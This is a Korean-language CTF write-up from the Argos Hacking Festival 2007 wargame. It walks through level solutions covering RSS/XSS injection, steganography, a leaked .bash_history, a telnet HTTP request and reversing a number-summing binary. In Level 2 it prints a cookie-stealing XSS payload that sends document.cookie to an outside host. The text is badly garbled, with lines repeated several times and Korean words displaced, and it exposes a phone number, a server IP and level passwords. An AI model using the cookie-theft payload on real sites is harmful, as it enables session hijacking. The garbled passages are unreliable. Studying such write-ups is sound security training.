argos hacking festival 2007
TRANSCRIPT
- Argos Hacking Festival 2007 -- Argos Hacking Festival 2007 -- Argos Hacking Festival 2007 -- Argos Hacking Festival 2007 -
2007. 1. 15~16
윤석언([email protected])
http://168.188.130.242/ahf2006/ (jhysu)
=================================== Level1=================================== Level1=================================== Level1=================================== Level1
<center>
<a href=http://www.spidynamics.com/assets/documents/HackingFeeds.pdf><img
src=../img/rss.jpg border=0></a><br>
위 그림을 클릭하시면 위 문서 를 다운받으실 수 있습니<font color=#AAAAAA> (PDF)
다.</font><br><br><script>alert('AHF2006 uses a rss feed, just for fun
은 데프콘 에서 발표된 취약점입니:D');</script>RSS/ATOM Feed Injection 2006
다 취약점이 아직 대부분의 프로그램에서 존재합니다 앞으로.<br>XSS RSS Reader .<br>
이에 대한 주의가 필요하지 않을까싶네요^^<br><iframe src=./rss_password width=0<iframe src=./rss_password width=0<iframe src=./rss_password width=0<iframe src=./rss_password width=0
height=0>height=0>height=0>height=0>
=================================== Level 3=================================== Level 3=================================== Level 3=================================== Level 3
소스보기
파일 다운로드 됨default.css .
========================================== Level8========================================== Level8========================================== Level8========================================== Level8
manlikessexygirl
========================================== Level7========================================== Level7========================================== Level7========================================== Level7
그림 다운로드...(badboys.gif)
스테가노그래피 암호.....
파일이 나타남pwd.txt ...
010 - 6479 - 6988 call me
전화하면 답 알려줌....
========================================== Level5========================================== Level5========================================== Level5========================================== Level5
의 을 구글링 한다badboys URL .
========================================== Level6========================================== Level6========================================== Level6========================================== Level6
아무데서나 소스보기 가 있는데 그 파일을 아래와 같이 포트로 요청을-> /css/embed.js , ~~.css 80
한다 이렇게 임포트 되어 있다. import(ahf~~~) .
========================================== Level2========================================== Level2========================================== Level2========================================== Level2
게시판에 공격을 하면 됨to.ahf2006 XSS .
이런식으로....
그러면 관리자가 읽으면 쿠키가 위 경로로 저장이 된다.
Social_is_best_hacking
# telnet 168.188.130.242 80
Trying 168.188.130.242...
Connected to 168.188.130.242.
Escape character is '^]'.
http://168.188.130.242/ahf2006/css/embed.js
축하합니다 정답입니다<font color=#ffffff><small> ! level6 !</small></font><br><font
패스워드는 입니다color=#ffffff><small> HackTheFlashActionScript .</small></font>
<script>self.location='http://168.188.130.242/ahf2006/';</script>Connection
closed by foreign host.
<script language=javascript>
window.open("http://xxx.xxx.xxx.xxx/~slaxcore/aa.php?cook="+document.cooki
e);</script>
========================================== Level4========================================== Level4========================================== Level4========================================== Level4
소스보기 하면 아래의 경로 의심..(~admin) ...
http://168.188.130.242/~admin/.bash_history 파일 경로 및 파일명 유추
ll
echo "binish is handsome! :p"
vi css/default.css
cd main/
ll
vi head.php
cd ../img
ll
cd ../main/
ll
vi head.php
cd ..
ll
cd ..
ll
cd /usr/local/apache/htdocs/
ll
ll
cd css/
cd ..
ll
cd
ll
cd ahf2006/
ll
d main/
ll
cd main/
vi head.php
ll
mv udcsc.php contact.php
vi hoe
ll
echo "x15kangx is the new face of argos!"
vi head.php
vi tail.php
vi head.php
vi home.php
vi head.php
vi home.php
vi tail.php
vi home.php
vi head.php
vi tail.php
vi head.php
vi tail.php
vi head.php
vi home.php
vi head.php
vi tail.php
vi head.php
vi tail.php
vi home.php
vi head.php
vi home.php
vi head.php
vi home.php
vi tail.php
vi home.php
vi head.php
vi tail.php
vi home.php
vi head.php
vi tail.php
vi head.php
vi home.php
vi head.php
vi home.php
vi head.php
vi home.php
vi head.php
vi home.php
vi head.php
wget "http://sexy_site/ya_han_movie.avi"
vi home.php
ll
vi intro.php
vi ../join/join
vi ../join/join.php
vi level.php
vi ../board/board_list.php
vi head.php
vi contact.php
i home.php
vi home.php
vi head.php
ll
vi home.php
vi head.php
ll
vi ../board/board_list.php
vi contact.php
vi ../board/board_list.php
vi head.php
vi level.php
vi re
vi ../join/join.php
exit
x
cd ahf2006/
ll
cd main
ll
vi head.php
ll
vi default.css default.css
vi default.css
vi default.css
ll
cd ..
cd /home/admin/public_html/admin/
vi index.php
vi /usr/local/apache/conf/httpd.conf
/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin
/usr/local/apache/bin/apachectl restart
ll
cd main
ll
vi intro.php
vi intro.php
ll
vi member.php
ll
cd ..
위 빨간 글씨부분이 눈여겨 보아야 할 부분임....
ll
vi member.
vi member.php
ll
cd join
ll
cd ..
ll
cd css
vi default.css
ll
cd ..
ll
vi main/home.php
cd css/
ll
vi default.css
ll
cd ..
cd ..
ll
ll
cd ../dhf2006/
ll
vi main/home.php
vi main/head.php
cd
cd ahf2006/
ll
vi css/default.css
ll
pwd
cd ..
=================================================Level9=================================================Level9=================================================Level9=================================================Level9
리버싱을 통한 개의 숫자 합을 구하는 문제2006
004066F6 . 8D7424 20 LEA ESI,DWORD PTR SS:[ESP+20]
004066FA > 8B2E MOV EBP,DWORD PTR DS:[ESI]
합을 에 저장004066FC . 03FD ADD EDI,EBP ; edi
004066FE . 40 INC EAX
004066FF . 894424 1C MOV DWORD PTR SS:[ESP+1C],EAX
00406703 . 50 PUSH EAX
00406704 . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
00406708 . 68 7C014300 PUSH AHF2006.0043017C ; ASCII "%d"
0040670D . 50 PUSH EAX
0040670E . E8 87430100 CALL AHF2006.0041AA9A
00406713 . 83C4 0C ADD ESP,0C
00406716 . 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]
번째 값0040671A . 68 70014300 PUSH AHF2006.00430170 ; :
0040671F . E8 14930100 CALL AHF2006.0041FA38
00406724 55 PUSH EBP00406724 55 PUSH EBP00406724 55 PUSH EBP00406724 55 PUSH EBP 합을 출력; push edi ( )
00406725 . 8D4C24 18 LEA ECX,DWORD PTR SS:[ESP+18]
00406729 . 68 7C014300 PUSH AHF2006.0043017C ; ASCII "%d"
0040672E . 51 PUSH ECX
0040672F . E8 66430100 CALL AHF2006.0041AA9A
00406734 . 83C4 0C ADD ESP,0C
00406737 . 8D5424 14 LEA EDX,DWORD PTR SS:[ESP+14]
0040673B . 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]
0040673F . 52 PUSH EDX
00406740 . E8 1A930100 CALL AHF2006.0041FA5F
00406745 . 8B4424 10 MOV EAX,DWORD PTR SS:[ESP+10]
00406749 . 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18]
0040674D . 53 PUSH EBX
0040674E . 53 PUSH EBX
0040674F . 50 PUSH EAX
00406750 E8 B67A0100 CALL AHF2006.0041E20B
00406755 8B4424 1C MOV EAX,DWORD PTR SS:[ESP+1C]
00406759 83C6 04 ADD ESI,4
0040675C 3D D6070000 CMP EAX,7D6
00406761 ^ 7C 97 JL SHORT AHF2006.004066FA
00406763 . 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]LEA ECX,DWORD PTR SS:[ESP+14]LEA ECX,DWORD PTR SS:[ESP+14]LEA ECX,DWORD PTR SS:[ESP+14]
00406767 . 889C24 801F00>MOV BYTE PTR SS:[ESP+1F80],BL
위의 를push ebp 로 수정push edi 하여 저장하고 나와서 프로그램을 실행시키면 누적된 합들이 출력이
될것이다 엔터 누르고 있으면 곧 개의 합이 출력됨. 2006 .
아니면 디버거에서 아래쪽 부분에 브포를 걸고 실행을 계속 시키면 레지스터에 합이 저장이 될것이다edi
99366